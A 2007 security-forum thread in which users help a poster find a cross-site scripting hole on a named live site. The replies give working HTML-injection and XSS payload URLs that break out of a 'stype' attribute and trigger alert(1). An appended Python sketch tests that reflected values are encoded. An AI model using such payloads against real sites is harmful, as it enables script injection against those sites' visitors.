Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Need help with filters
Posted by: hwEll
Date: June 28, 2007 12:33PM

I am trying to find an XSS hole, thus I tried

'';!--"<XSS>=&{()}

from the cheat sheet, and when I viewed the source I get this

Search for: <input type='text' name='stext' value='&#39;&#39;;!--&quot;&lt;XSS&gt;=&{()}' class='textbox' style='width:200px'>

Any help with it?

Re: Need help with filters
Posted by: nEUrOO
Date: June 28, 2007 03:32PM

Well, they seem to have a correct filter, so there is not much you could do here...

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Re: Need help with filters
Posted by: Kyran
Date: June 28, 2007 08:51PM

The short locator doesn't cover everything. Try multiple quotes, etc.

- Kyran

Re: Need help with filters
Posted by: Anonymous User
Date: June 29, 2007 05:28AM

You could also check how the filter reacts to entities - try to inject stuff like %27, %2%277, &#39; or &#3&#399;

Re: Need help with filters
Posted by: hwEll
Date: June 30, 2007 05:44AM

Nope, I don't get it... What should I do? What do you need me to inject and see?

Re: Need help with filters
Posted by: Anonymous User
Date: June 30, 2007 07:21AM

URL?

Re: Need help with filters
Posted by: hwEll
Date: June 30, 2007 07:44AM

http://homegrownsecurity.org/

Re: Need help with filters
Posted by: Mephisto
Date: June 30, 2007 09:22AM

HTML Injection

http://homegrownsecurity.org/search.php?stype=f'><h1><font%20color='red'>Injected%20HTML</font></h1>

Re: Need help with filters
Posted by: Anonymous User
Date: June 30, 2007 10:10AM

Doesn't work on Firefox

Re: Need help with filters
Posted by: ma1
Date: July 01, 2007 05:10PM

XSS
http://homegrownsecurity.org/search.php?stype=f'style='width:5000;height:5000;opacity:0;position:absolute;top:-2000;left:-2000;z-index:1000'onmouseover='document.body.innerHTML=location.hash#<img/src='404'onerror=alert(1)>

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: Need help with filters
Posted by: hwEll
Date: July 02, 2007 02:45PM

Thanks

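Added example, not part of the thread and not the site's code: the first post shows `stext` coming back entity-encoded, while the later posts go through a different parameter, `stype`. The Python sketch below encodes every reflected value for the quoted-attribute context and checks that none can leave its attribute; the template (a single-quoted hidden field for `stype`), the function names and the inert `PROBE` string are assumptions.

```python
import html
from html.parser import HTMLParser

# Assumed template: the thread shows only the stext <input>; how stype is
# reflected is not shown, so a single-quoted hidden field is assumed here.
TEMPLATE = ("<form>Search for: <input type='text' name='stext' value='{stext}' "
            "class='textbox' style='width:200px'>"
            "<input type='hidden' name='stype' value='{stype}'></form>")
LOCATOR = "'';!--\"<XSS>=&{()}"   # probe string quoted in the first post
PROBE = "f' data-x='1"            # constructed, inert attribute-breakout probe

def render_inconsistent(stext, stype):
    """Encodes stext only: one reflected value is covered, the other is not."""
    return TEMPLATE.format(stext=html.escape(stext, quote=True), stype=stype)

def render_encoded(stext, stype):
    """Encodes every reflected value for the quoted-attribute context."""
    return TEMPLATE.format(stext=html.escape(stext, quote=True),
                           stype=html.escape(stype, quote=True))

class Shape(HTMLParser):
    """Collects (tag, attrs) per start tag; attribute values are entity-decoded."""
    def __init__(self):
        super().__init__()
        self.tags = []
    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, attrs))

def shape(markup):
    parser = Shape()
    parser.feed(markup)
    parser.close()
    return parser.tags

def names(tags):
    return [(tag, [key for key, _ in attrs]) for tag, attrs in tags]

def stays_in_attribute(render, stext, stype):
    """True if the markup keeps the tags and attribute names of a benign
    render and both values come back exactly as submitted."""
    got = shape(render(stext, stype))
    if names(got) != names(shape(render("a", "b"))):
        return False
    values = {dict(a).get("name"): dict(a).get("value") for _, a in got}
    return values.get("stext") == stext and values.get("stype") == stype

if __name__ == "__main__":
    for fn in (render_inconsistent, render_encoded):
        print(fn.__name__, stays_in_attribute(fn, LOCATOR, PROBE))
```

Run as a regression test over every parameter a page reflects, the check fails as soon as one of them is written into markup without encoding, even when the others are handled correctly.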

